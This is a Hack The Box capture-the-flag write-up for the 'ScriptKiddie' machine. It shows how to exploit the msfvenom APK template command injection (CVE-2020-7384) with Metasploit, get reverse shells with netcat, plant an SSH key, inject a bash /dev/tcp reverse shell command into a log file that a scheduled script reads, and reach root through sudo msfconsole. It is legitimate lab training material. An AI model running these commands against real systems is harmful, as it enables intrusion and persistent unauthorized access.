Post

HTB ScriptKiddie Writeup

Posted
Preview Image
By , 2 min read

INFO

Machine IP = 10.10.10.226
OS = Linux
Level = EASY
Points = 20

Write the IP of the machine to your /etc/hosts file

1

echo "10.10.10.226 scriptkiddie.htb" >> /etc/hosts

Scanning

1

nmap -sC -sV 10.10.10.226

Enumeration

Nmap:

1
2
3

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol
5000/tcp open  http    Werkzeug httpd 0.16.1 (Python 3.8.5)

the page has a msfvenom upload tab…which can take a template. searched google for msf template upload vuln.Found it has a CVE-2020-7384,found a github page…git cloned the code..ran the program ,got an apk file

1
2
3
4
5

https://www.exploit-db.com/exploits/49491

Or

https://www.rapid7.com/db/modules/exploit/unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection/

1
2
3
4
5
6

msf6 > use exploit/unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection
msf6 exploit(unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection) > set LHOST <Your IP Address>
msf6 exploit(unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection) > run

[+] msf.apk stored at /home/kali/.msf4/local/msf.apk


1
2

nc -lnvp 4444

Then upload apk to site and set IP to 127.0.0.1 or any IP Address and chose Android to get a reverse shell

1
2
3
4

listening on [any] 4444 ...
connect to [10.10.15.26] from (UNKNOWN) [10.10.10.226] 38492
id
uid=1000(kid) gid=1000(kid) groups=1000(kid)

Also you can do this steps to get a ()

  • Get id_rsa.pub from your VM or pc
  • On reverse shell add your id_rsa to 
    1

    echo "ssh-rsa ****=" >> ~/.ssh/authorized_keys

    Then do ssh

    1

    ssh [email protected]

    ``` python3 -c ‘import pty; pty.spawn(“/bin/bash”)’ kid@scriptkiddie:~/html$

kid@scriptkiddie:~/html$ cd ~ cd ~ kid@scriptkiddie:~$ ls ls html logs snap user.txt kid@scriptkiddie:~$ cat user.txt cat user.txt

1
2
3
4
5

Let's enumerat a logs folder
- Logs folder have only hackers file and it's empty 
- Home directory have two users (kid - pwn) and root user in ``` /etc/passwd ```

In pwn found a scanlosers.sh file..having the code.

#!/bin/bash

log=/home/kid/logs/hackers

cd /home/pwn/ cat $log | cut -d’ ‘ -f3- | sort -u | while read ip; do sh -c “nmap –top-ports 10 -oN recon/${ip}.nmap ${ip} 2>&1 >/dev/null” & done

if [[ $(wc -l < $log) -gt 0 ]]; then echo -n > $log; fi

1
2

Go to logs folder, and run a reverse shell through the following code.

echo “ ;/bin/bash -c ‘bash -i >& /dev/tcp/10.10.15.26/8181 0>&1’ #” » hackers

1
2

And run a netcat

nc -lnvp 8181

1
2

On revers shell run this

sudo msfconsole

msf6 > /bin/bash stty: ‘standard input’: Inappropriate ioctl for device [*] exec: /bin/bash

cat /root/root.txt

``` Done!

Hi there 👋 Support me!

Life is an echo—what you send out comes back.

Donate

HackTheBox, Writeup, Easy
Writeup HTB-Easy
This post is licensed under CC BY 4.0 by the author.